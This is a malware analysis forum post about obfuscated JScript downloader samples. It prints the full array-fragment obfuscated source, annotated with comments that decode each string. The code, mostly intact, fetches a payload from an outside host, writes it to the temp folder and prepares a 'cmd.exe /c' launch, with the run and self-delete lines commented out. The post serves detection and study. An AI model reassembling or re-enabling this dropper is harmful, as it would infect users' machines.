From https://malwaretips.com/threads/21-11-2016-7.65690/
Thanks to @Daniel Hidalgo
8/54 INFO_19595.js
6/54 EURO_8636.js
6/54 EMAIL_25793.js
Why these samples ?
Because they are from the same family I analyzed a few days ago, but the error mentioned there has been corrected and the obfuscation used with the arrays has been improved.
YOU REALLY NEED TO SEE THE PREVIOUS ANALYSIS BEFORE READING THE CURRENT ONE
The link from the previous test :
https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/
These 3 samples use the same URL to download the payload, and the script parts use the same obfuscation methods.
So, I will only show the changes from POSTNORD_1755.js, using EMAIL_25793.js as the example.
1) What it looks like :
As usual, I made some modifications to the spoiler part to avoid "copy-paste => save => run => infection".
2) Main differences with previous analyzed POSTNORD_1755.js :
2-1 ) The arrays parts :
Before :
With this method, it is very easy to find the "pieces of strings" because it is always the last value of the array that is useful.
The previous sample in details : https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/
In the new samples :
In the previous sample, there was an error :
In these new samples, they have corrected it :
// Excerpt: the `case true:` branch of the `switch (ujdyqkoz)` block. The switch header
// and the surrounding script are not part of this excerpt; the complete listing further
// down the page shows them. ujdyqkoz is the boolean produced by the sample's environment check.
case true:
// The only line that matters: ileslyxy5 holds the source "return ActiveXObject;", so
// hvaqxena becomes the ActiveXObject constructor used for every COM object afterwards.
var hvaqxena = new Function(ileslyxy5)();
// Everything below is padding: a nested array indexed to yield one short string, and none
// of these names is referenced again in the listing.
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
Only one part is useful :
The other parts are the familiar useless array stuff (see part 2-1 above), only there to obfuscate the script a bit more
(remember that we have seen var hvaqxena: "return ActiveXObject;");
3) Main part - deobfuscated :
4) Conclusion :
Thanks to @Daniel Hidalgo
8/54 INFO_19595.js
6/54 EURO_8636.js
6/54 EMAIL_25793.js
Why these samples ?
Because they are from the same family I analyzed a few days ago, but the error mentioned there has been corrected and the obfuscation used with the arrays has been improved.
YOU REALLY NEED TO SEE THE PREVIOUS ANALYSIS BEFORE READING THE CURRENT ONE
The link from the previous test :
https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/
These 3 samples use the same URL to download the payload, and the script parts use the same obfuscation methods.
So, I will only show the changes from POSTNORD_1755.js, using EMAIL_25793.js as the example.
1) What it looks like :
As usual, I made some modifications to the spoiler part to avoid "copy-paste => save => run => infection".
// Analyst notes (review): EMAIL_25793.js as posted, with the author's neutering edits kept.
// Obfuscation pattern of this section: every `var` indexes an array literal whose single
// string element sits at the quoted index, so each statement yields one short string
// fragment; the numeric elements are padding. The fragments are concatenated below into
// COM ProgIDs, method names and JScript source that is compiled with `new Function`.
// Detection hint: no fragment is meaningful on its own; the signal is `new Function` over
// concatenated strings together with `WScript` and ActiveX class names built at runtime.
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
var yfezico0 = [8, "9 =", 9, 8, 8, 8, 5, 1]["1"];
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];
var kzunaxve5 = [6, 5, 7, 7, 6, 7, 8, 5, "eTo"]["8"];
var jzucpekkage = [4, 3, 6, 3, 5, 4, "cia", 2, 6, 3]["6"];
var otvebolhyn = [5, 9, 5, 6, 2, 3, 8, 'on', 4, 2]["7"];
var bvunygze9 = [2, "rn '", 2, 6, 1, 6, 5, 1]["1"];
var yfjobulki = ["jw ", 1, 1, 7, 1, 6, 1, 4, 6, 4]["0"];
var jyryxxirnu = ['e', 2, 6, 2, 5, 9, 6, 4]["0"];
var qdiqxywili4 = [4, 7, 1, 5, "1')", 3, 3, 9, 5, 2]["4"];
var ohmicmoftil = ["scri", 6, 5, 4, 7, 6, 5, 4, 6]["0"];
var ygpagag = [4, 9, 6, 3, 2, "ont", 5, 2]["5"];
var lagyvgeq4 = [6, 3, 5, 1, 5, 2, "lFo", 3]["6"];
var xqasmyvpe = [" 4;", 3, 5, 2, 6, 8, 6, 9, 4]["0"];
var usbijvepij = [6, 3, "ngt", 8, 9, 9, 1, 4, 6, 3]["2"];
var qziherlamwo = [8, 2, 2, 6, 9, 6, 3, 9, "h.t", 4]["8"];
var slyplumxop8 = [1, 6, 8, 4, 3, 6, "bje", 9, 1, 1]["6"];
var iwebog = [5, 4, 3, 5, 7, "yst", 3, 5, 4]["5"];
var gemoto6 = [5, 3, 5, 3, 8, 3, "etu", 8, 9]["6"];
var binsujod1 = [3, 4, "xv9", 8, 7, 5, 8, 5, 3]["2"];
var bzacoge6 = [1, 4, 1, 3, "stem", 6, 7, 5, 5, 7]["4"];
var izretadvi = [3, 5, 2, 1, "ive", 7, 9, 2]["4"];
var cbufzeqkulc5 = [1, 3, 6, 6, 4, "MSXM", 2, 9]["5"];
var tanynu2 = [4, "ct';", 4, 6, 5, 6, 2, 8]["1"];
var iqjiwpalo = [9, 7, 9, 9, 8, 2, 5, "tiv", 6, 2]["7"];
var utyxoju2 = ["g.Fi", 4, 9, 3, 8, 3, 9, 4]["0"];
var otyvzysun = [7, 3, "urn", 4, 2, 3, 1, 4, 8, 7]["2"];
var qusuhyxi = ['Stat', 1, 8, 3, 2, 6, 5, 5]["0"];
var yfomgurudm = [7, 8, 8, "Nam", 5, 5, 6, 1, 2]["3"];
var worityn = [8, 2, "Act", 9, 8, 1, 8, 8, 1, 7]["2"];
var vvecjijki4 = [4, 4, 6, 9, 6, 1, 5, "htt", 8]["7"];
var lgufjaregzi = ['iti', 7, 2, 3, 7, 2, 3, 9, 6, 4]["0"];
// Handle on the Windows Script Host object; read later for ScriptFullName.
var aqympiw = WScript;
var akiwely = [7, "0()", 1, 7, 3, 6, 3, 8]["1"];
var yxytud8 = [2, 9, 7, "p:/", 5, 4, 2, 9]["3"];
var uzanulx = [2, 7, 8, 6, 8, 1, 1, 5, 4, "asu"]["9"];
var uxysizi = [4, 6, 6, 2, 6, 8, 9, "/ww", 7]["7"];
var fumweledzu6 = ["ipt.", 5, 2, 8, 2, 6, 6, 5]["0"];
var wexuflu = [1, 3, 8, 2, 'me', 9, 1, 2, 5]["4"];
var rajkezhefli = [8, 3, 6, 4, 7, "ptin", 1, 2, 4]["5"];
var ugipit5 = [5, "op/", 7, 7, 5, 3, 7, 3]["1"];
var ruxrabu = [7, 'me', 9, 6, 7, 5, 7, 8]["1"];
var qcevesrozci = [4, 6, 9, "h >", 6, 5, 9, 5, 5]["3"];
var yptypmewo4 = [8, 7, 9, 6, 1, 7, 2, "ily"]["7"];
var yfhopiqluhh2 = [7, 8, 5, 7, 1, 4, "ath", 4, 4]["6"];
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];
var zevibnib = [1, "seB", 1, 4, 2, 2, 2, 5, 7, 8]["1"];
var jajyhyxwy = [7, 6, 5, 8, 2, 8, 8, 3, 6, 'Ful']["9"];
var yjybxywif5 = [8, 9, 2, "teP", 8, 7, 4, 7, 5]["3"];
var wmunafy = [7, 3, 7, 6, 2, "eam", 8, 9]["5"];
var gamcedeku0 = ["jw.", 8, 8, 1, 1, 5, 8, 7]["0"];
var mazqakyjzo = [3, 5, 5, "ADO", 5, 5, 5, 5]["3"];
var osabaq = [9, 6, 2, 'Typ', 1, 1, 1, 2]["3"];
var nygqyczoz = [2, 3, 4, 7, "MLHT", 9, 8, 6, 6]["4"];
var bidnovvyqp6 = ["apl", 4, 3, 5, 9, 7, 4, 1, 3]["0"];
var awgykpomoj1 = ["Clos", 3, 9, 3, 9, 2, 8, 9, 7, 2]["0"];
var tfufubres0 = [3, 5, 8, 5, 7, 'Tem', 8, 5]["5"];
var keluqy4 = [3, 2, 2, 9, 1, 9, "bje", 7]["6"];
var lgimonra3 = [1, "Pos", 1, 9, 2, 4, 1, 4]["1"];
var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
var zbydiqsoli4 = [6, "at", 5, 5, 2, 2, 1, 9, 1, 8]["1"];
var brisewet = [6, 5, 9, 7, 9, "L2.X", 1, 4, 9, 4]["5"];
var fjynhevonra1 = [2, 'Sav', 9, 2, 9, 3, 2, 8, 1, 5]["1"];
var molycohj0 = ["e('", 6, 1, 5, 2, 5, 3, 9, 3, 7]["0"];
var ashesubw5 = [5, 5, 4, 8, 2, 5, 1, 5, "akp", 2]["8"];
var mypzynkug = ["?f=", 1, 9, 8, 8, 7, 4, 3]["0"];
var hnegfepsuta3 = [2, 7, 3, 4, 1, 3, 5, 6, "te", 9]["8"];
var brigigo4 = [6, "Obje", 5, 5, 2, 5, 9, 3]["1"];
var iveruky = [3, 3, "Abs", 6, 6, 7, 2, 2, 4, 9]["2"];
var hdocirzy1 = [5, 6, "e", 2, 5, 9, 2, 7, 9]["2"];
var kjunyhimo = [8, 9, 4, 7, 1, "Get", 5, 6, 8]["5"];
var tonumejt = [3, 6, 5, "ipt", 3, 1, 7, 1]["3"];
var tigviqzave7 = [9, "ing", 8, 5, 4, 1, 1, 8]["1"];
var ysgupuphuwh = [3, 9, "wug", 2, 7, 4, 8, 3, 2, 6]["2"];
var umunozemw = [1, 5, 2, 4, 6, 9, 8, 8, "retu"]["8"];
var djyvoroc = [7, 6, 8, 5, 9, 9, 2, "l", 1, 7]["7"];
var ytydqesxer0 = [9, 1, 8, 3, 6, 4, 3, 2, "ew ", 9]["8"];
var exaqkyvtir = [4, "t(m", 7, 5, 6, 5, 5, 6]["1"];
var uvmewasca = [9, 7, 1, 9, 8, 8, 3, 2, 4, 'r']["9"];
var izucuwg3 = [6, 2, 4, ".le", 7, 3, 9, 1, 5]["3"];
var ucyvyxquqk = [9, 9, 7, 9, 8, 3, "jec", 2]["6"];
var ynabovx4 = [6, "us", 5, 3, 6, 8, 4, 7, 8]["1"];
var omxemhylf2 = [4, 5, 3, 4, 6, " jr", 4, 2, 6]["5"];
var ysvafvef4 = [2, 6, 6, 8, 6, "ret", 4, 1]["5"];
var evqubecipn7 = [1, 7, 9, 3, 4, 9, 1, "); ", 6, 6]["7"];
var bifwotpu = ["; r", 9, 1, 5, 4, 7, 9, 7, 5]["0"];
var jenhadno1 = ['ody', 2, 1, 8, 4, 1, 9, 7]["0"];
var rtyrcomozsa8 = [8, 5, 4, 9, 'Get', 5, 4, 1]["4"];
var yksazbasfo8 = [6, 'Res', 6, 9, 8, 1, 9, 1, 5]["1"];
var ywdoczycg = [3, 5, "Str", 3, 6, 1, 5, 7]["2"];
var nuvykkorbu = [7, "Shel", 1, 7, 8, 2, 2, 1, 9]["1"];
var onbitbij = ["WScr", 8, 7, 4, 7, 3, 8, 2, 5, 8]["0"];
var ybyjecehm = [2, "DB.", 6, 2, 6, 8, 6, 8]["1"];
var vwafgehni0 = [1, 9, 6, "run", 6, 6, 8, 1, 6]["3"];
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];
var uqdostufy1 = [5, 5, "= n", 9, 6, 5, 1, 3]["2"];
var bbegvobexjy6 = [1, 2, 1, 3, 5, 8, 2, 4, "TP"]["8"];
var porosy6 = [9, 3, "asu", 5, 8, 1, 9, 3]["2"];
var hgudipcu = [2, 4, 2, 2, 1, 4, 6, "n", 1, 3]["7"];
var ojhenyteht = ["rn ", 3, 5, 6, 1, 9, 9, 5, 2, 7]["0"];
var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
var ofeqyxhuwt = [4, 9, "eXO", 1, 3, 7, 1, 3]["2"];
var kpiheko = [3, 8, 5, 5, 6, 6, 5, 6, "ugv", 5]["8"];
var deqxihaky = [2, 9, 7, 5, 2, 9, "olu", 1]["6"];
var kyvgicis3 = [1, 3, 1, 3, 7, 4, 1, 8, "var", 1]["8"];
var obutdymi = [4, 'Fil', 4, 4, 8, 7, 4, 5, 2]["1"];
var tkymrawcy = [2, 5, 3, 9, 1, 'ipt', 8, 3, 6, 7]["5"];
var fhadisuhy = [6, 6, 3, 1, 8, 4, "leS", 2, 1, 6]["6"];
var rzedsygwu = [3, 3, 6, 7, 7, "w.c", 5, 1]["5"];
// Path separator fragment. As posted the literal holds two backslashes; whether that is
// the sample's own text or a forum escaping artefact cannot be told from this page.
var anhujyv1 = [3, 5, 9, 8, "\\\\", 9, 4, 7]["4"];
var udbuxdakhavq = [1, 2, 8, 6, "adm", 9, 5, 1]["4"];
var fdukezyh8 = [6, 5, 3, 5, 9, 9, 6, 2, "Scr", 7]["8"];
var texlopkak1 = [2, 7, 5, 3, "Scr", 8, 6, 8, 6, 6]["4"];
var episyvt7 = [7, 6, 5, 8, 5, 1, 6, 7, "php", 9]["8"];
var ewnehaca = [8, 9, 9, " Ac", 3, 9, 2, 1]["3"];
var emytipq = [7, 4, 5, 9, 1, 5, 3, "ct;", 3, 3]["7"];
var soxispi = [1, ".Fi", 2, 2, 3, 1, 5, 9]["1"];
var ihdufdutynd6 = [9, 8, 5, 3, 4, 6, 3, 2, 6, "XOb"]["9"];
var uflesepf = [3, "riv", 2, 4, 4, 2, 6, 6, 8, 9]["1"];
var zudxoba8 = [2, 7, 'e', 3, 3, 4, 4, 7, 3, 1]["2"];
var bacodta2 = [4, 7, "emO", 8, 5, 8, 4, 1, 4]["2"];
var afehjate1 = [9, 5, 'lNa', 1, 9, 3, 7, 5, 2, 8]["2"];
var exacdubx = [3, 8, 9, 8, 7, 5, "in.", 8, 3]["6"];
var oxefzetfez2 = [1, 2, "vil", 5, 9, 4, 2, 4, 3, 5]["2"];
var ipexetl = [5, 8, " jr", 6, 2, 2, 4, 1, 2]["2"];
var hhitwycyxd0 = [4, 4, 5, 1, 6, 'lde', 1, 2]["5"];
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];
var snumsisike = [8, 1, 4, 3, 3, 9, 1, 'Wri', 6, 7]["7"];
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];
var quludvi1 = ["Spe", 8, 3, 7, 9, 1, 9, 5]["0"];
var aptimota = [8, "var", 9, 6, 6, 7, 4, 7, 4]["1"];
var mixemrid4 = [9, 5, "ct", 2, 6, 5, 7, 5, 8, 9]["2"];
var odrifmigh = [8, "lesy", 1, 5, 7, 3, 8, 8, 7]["1"];
var odomebef = [4, 6, 7, 8, 7, 3, "pon", 5]["6"];
var zcexsaqekg = [2, "Get", 1, 9, 3, 9, 8, 1]["1"];
var ulhabvaze2 = [8, 5, 6, 9, 7, 7, "edz", 4]["6"];
var etjufymurb = [3, 7, 8, 3, 9, 4, "yxv", 2, 4, 5]["6"];
var mopepo = ["GET", 7, 6, 2, 9, 7, 6, 5, 5]["0"];
var xdimrugva0 = [2, 8, 8, 2, 2, 3, 8, "ovw"]["7"];
var ahnensuhuv = [6, 6, 8, 9, "2.d", 7, 8, 8]["4"];
var gibdymco0 = [4, "pNa", 3, 9, 4, 5, 6, 6]["1"];
var ipjatzypko = [4, "zyd", 6, 6, 1, 8, 8, 5]["1"];
var cimwenxi = [9, " ov", 5, 4, 6, 5, 7, 8, 4, 6]["1"];
var urtiwguqja = [4, 1, 'Ope', 9, 8, 6, 7, 9, 3]["2"];
var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];
// Assembled strings. Reading the fragments in order gives (first nine pieces):
// "return 'scripting.FilesystemObject';" -- the body of the helper compiled as mzydakpapl0 below.
var irvyrzisi1 = [4, 7, 2, umunozemw + bvunygze9 + ohmicmoftil + rajkezhefli + utyxoju2 + odrifmigh + bzacoge6 + brigigo4 + tanynu2, 6, 9, 4, 9]["3"];
// JScript source of the environment check: creates an FSO through mzydakpapl0(), calls
// GetAbsolutePathName('1') and returns whether the result is longer than 4 characters.
// This is most likely the corrected path-name check the post refers to (the previous
// sample's version raised an error).
var dijditonz6 = [2, 4, 3, 3, 6, 7, kyvgicis3 + ipexetl + porosy6 + yfjobulki + uqdostufy1 + ytydqesxer0 + worityn + izretadvi + ihdufdutynd6 + ucyvyxquqk + exaqkyvtir + ipjatzypko + ashesubw5 + bidnovvyqp6 + akiwely + evqubecipn7 + aptimota + cimwenxi + ysgupuphuwh + oxefzetfez2 + etjufymurb + yfezico0 + omxemhylf2 + uzanulx + gamcedeku0 + kjunyhimo + iveruky + deqxihaky + yjybxywif5 + yfhopiqluhh2 + yfomgurudm + molycohj0 + qdiqxywili4 + bifwotpu + gemoto6 + ojhenyteht + xdimrugva0 + kpiheko + yptypmewo4 + binsujod1 + izucuwg3 + usbijvepij + qcevesrozci + xqasmyvpe, 5]["6"];
// "return ActiveXObject;" -- compiled inside the switch to obtain the ActiveXObject constructor.
var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];
// "ADODB.Stream"
var yvyndax = [6, 2, 4, 6, 3, 6, 5, 4, mazqakyjzo + ybyjecehm + ywdoczycg + wmunafy, 3]["8"];
// Payload URL, assembled from 15 fragments (defanged): hxxp://www[.]contrivedzh[.]top/admin.php?f=2.dat
// The post states all three samples download from the same URL, so this is the IoC to block on.
var ijigsokhimw3 = [5, 5, 2, 9, 6, vvecjijki4 + yxytud8 + uxysizi + rzedsygwu + ygpagag + uflesepf + ulhabvaze2 + qziherlamwo + ugipit5 + udbuxdakhavq + exacdubx + episyvt7 + mypzynkug + ahnensuhuv + zbydiqsoli4, 3, 1, 5, 4]["5"];
// "WScript.Shell"
var derfycgy = [5, 2, 8, 6, 2, 6, onbitbij + fumweledzu6 + nuvykkorbu + djyvoroc, 3, 7, 4]["6"];
// "MSXML2.XMLHTTP"
var axduxynat = [cbufzeqkulc5 + brisewet + nygqyczoz + bbegvobexjy6, 1, 1, 6, 7, 9, 6, 8]["0"];
// "Scripting.FileSystemObject"
var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
// path separator (see anhujyv1 above)
var zgafgado = [6, 8, 6, 7, 7, 8, 7, anhujyv1, 2]["7"];
// "GET"
var yzozyvy = [4, 4, 7, 6, mopepo, 9, 2, 1, 1, 9]["4"];
// "cmd.exe /c " -- prefix of the command line built after the download.
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
// alias of the WScript host object
var imis9 = aqympiw;
// Helper returning the FSO ProgID. Note it is created but not invoked here; the check
// compiled at ujdyqkoz below calls it by its global name.
var mzydakpapl0 = new Function(irvyrzisi1);
// Decoys: nested array + index yielding a short string; none of these names is referenced
// anywhere else in the listing (the "useless arrays stuff" the post describes).
var mujegbe = [2, 7, 1, 8, ["rka", 1, 3, 6, 5, 5, 7, 7, 9], 1, 2, 3, 2, 2]["4"];
var cafyjep8 = [8, [6, 6, 3, 1, 3, 6, 4, 6, "cmi", 6], 5, 6, 8, 4, 2, 4]["1"];
var zfukqilvalho7 = [6, 9, 9, 3, 4, 9, 2, 9, 3, [2, 9, 7, 5, 1, 8, 5, 3, "up"]]["9"];
var yxivuvwus = [5, 9, 8, 1, 5, 3, 3, [4, 2, 9, 3, "vpa", 6, 7, 4, 5], 4]["7"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var yqlypnuksud = [8, 4, [8, 7, 1, 7, "gy", 3, 6, 4, 9, 6], 2, 5, 5, 8, 8, 1, 3]["2"];
var dcigacwa4 = [1, 5, 5, 7, 1, 9, 7, [1, 6, 1, "tto", 6, 2, 8, 5, 5], 7, 9]["7"];
var ubmycoble0 = [[2, "zh", 1, 3, 2, 5, 7, 4, 5], 7, 8, 3, 2, 9, 4, 2, 2, 6]["0"];
var ujtodunyf5 = [6, 7, [3, 5, 5, "co", 8, 4, 9, 8, 1], 8, 1, 1, 4, 5]["2"];
var japumu0 = [8, 6, [4, 7, 4, 7, 5, "ry", 9, 8, 6, 7], 7, 5, 5, 6, 1, 9, 3]["2"];
var zuvlezyxe8 = [[4, "lm", 6, 7, 6, 8, 9, 9, 5], 2, 1, 5, 3, 4, 1, 1, 1]["0"];
var ebecuntu5 = [5, 2, 3, 3, 5, 4, 2, ["lqy", 8, 2, 7, 6, 6, 1, 9, 6], 6, 1]["7"];
var mrovwegigca = [9, 3, 8, 3, 5, 1, [2, 2, "avb", 4, 5, 5, 4, 2], 6]["6"];
var zytxyfloldu = [7, 8, 2, 2, 6, 2, [4, "aq", 4, 8, 9, 3, 7, 8, 5, 9], 5, 4]["6"];
var qygsuwwo = [1, 1, [8, 2, "ex", 9, 6, 1, 8, 3], 4, 3, 1, 3, 5]["2"];
// Runs the environment check; ujdyqkoz is the boolean that gates the switch that follows.
var ujdyqkoz = new Function(dijditonz6)();
// More decoys, same pattern, never referenced again.
var asborqyqkyrm0 = [3, [7, 1, 1, 1, 3, 9, "o", 2], 7, 9, 3, 8, 9, 5, 8, 1]["1"];
var gykehogcu3 = [5, 8, 9, 4, [4, 1, 5, 1, 6, 4, 7, "k", 3], 2, 9, 8, 3]["4"];
var daxzaxyme4 = [2, [1, 8, 8, 4, "abt", 1, 9, 7, 6, 8], 2, 7, 2, 1, 5, 6, 1]["1"];
var hcimuqxixw4 = [7, 8, [5, "u", 9, 5, 6, 9, 3, 6], 7, 9, 3, 6, 5]["2"];
var hujcesej = [9, 4, [4, 2, 7, "mna", 8, 6, 5, 5], 7, 4, 4, 9, 8, 7]["2"];
var epowpabnohp4 = [5, 8, 3, ["sc", 4, 8, 2, 7, 5, 6, 1], 9, 7, 5, 6, 2, 1]["3"];
var ymseppybi4 = [[6, 9, "va", 3, 3, 1, 8, 3], 2, 2, 9, 2, 3, 3, 8]["0"];
var gpasgufxeti0 = [4, 1, 4, 2, 5, 1, [8, 7, "g", 4, 7, 7, 8, 4, 9], 8, 3, 5]["6"];
var utduhaciwp3 = [1, 2, [8, 4, 7, 1, 2, 6, 3, 1, 7, "it"], 2, 4, 8, 3, 5]["2"];
var mjowyfzuk = [8, 9, 2, 5, 2, [4, "o", 4, 9, 1, 2, 1, 7], 3, 8, 5]["5"];
var vekxiby = [8, 9, 6, [5, 7, 2, 8, 4, "kq", 5, 7], 7, 6, 1, 4, 6]["3"];
var omalobre7 = [1, [5, 1, 5, 4, "xu", 3, 4, 7, 9, 7], 4, 9, 8, 8, 4, 9, 4]["1"];
var azocxisw = [[4, 8, 9, 8, "ufk", 8, 2, 3], 6, 2, 7, 2, 3, 2, 3, 9, 5]["0"];
var yxycqati = [5, 2, [5, 9, 9, 6, 4, 9, "z", 2, 8, 1], 7, 5, 1, 4, 9]["2"];
var guzcapebh = [3, 6, 5, 7, 8, 2, 9, [7, 3, "o", 4, 8, 6, 4, 7, 8]]["7"];
// Gate: only when the FSO path check returned `true` is the ActiveXObject constructor
// obtained. For any other value hvaqxena stays undefined, so the `new hvaqxena(...)`
// calls that follow throw and the script aborts before downloading anything.
switch (ujdyqkoz) {
case true:
// hvaqxena = ActiveXObject (the compiled body is "return ActiveXObject;").
var hvaqxena = new Function(ileslyxy5)();
// The rest of the case is padding; none of these names is referenced again.
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
// Main routine, with the decoded meaning of each bracketed property in the comments:
// fetch the payload over XMLHTTP, write it to a temp file with ADODB.Stream, then (in the
// original) execute it and delete this script. The two action lines are commented out here,
// consistent with the post's note that the spoiler was modified to prevent copy-paste execution.
// Detection angle: wscript.exe making an outbound HTTP GET, creating a file in the temp folder
// right afterwards, and then spawning cmd.exe /c <temp file>.
var owdeqg2 = yvyndax;
// new ActiveXObject("ADODB.Stream")
var ekwidedul = new hvaqxena(owdeqg2);
// stream.Open()
ekwidedul[urtiwguqja + hgudipcu]();
// payload URL
var qupqykmy = ijigsokhimw3;
// stream.Position = 0
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;
var gmavabava8 = derfycgy;
// WScript.ScriptFullName -- this script's own path; only used by the commented-out delete at the end.
var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];
// new ActiveXObject("WScript.Shell") -- only used by the commented-out run line.
var exet3 = new hvaqxena(gmavabava8);
var qrujcydvipd9 = axduxynat;
var gvidummulj7 = epcemescip;
// new ActiveXObject("Scripting.FileSystemObject")
var jrasujw = new hvaqxena(gvidummulj7);
// new ActiveXObject("MSXML2.XMLHTTP")
var abogikn = new hvaqxena(qrujcydvipd9);
// Target path: fso.GetSpecialFolder(2) (the temp folder) + separator + fso.GetTempName().
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();
// xmlhttp.open("GET", url, 0) -- third argument 0 makes the request synchronous.
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);
// xmlhttp.send()
abogikn[pdimuly]();
// stream.Type = 1 (binary)
ekwidedul[osabaq + zudxoba8] = 1;
// if (xmlhttp.Status == 200) -- no other status is handled; a failed download silently does nothing.
if (abogikn[qusuhyxi + ynabovx4] == 200) {
// stream.Write(xmlhttp.ResponseBody)
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
// stream.SaveToFile(tempPath)
ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);
// stream.Close()
ekwidedul[awgykpomoj1 + hdocirzy1]();
// "cmd.exe /c " + tempPath
var yhamgyv1 = odynfinteds + czeqip;
// Original: shell.run(commandLine, 0) -- neutered by the post author.
//exet3[vwafgehni0](yhamgyv1, 0);
}
// Original: fso.DeleteFile(WScript.ScriptFullName) -- self-deletion, also neutered.
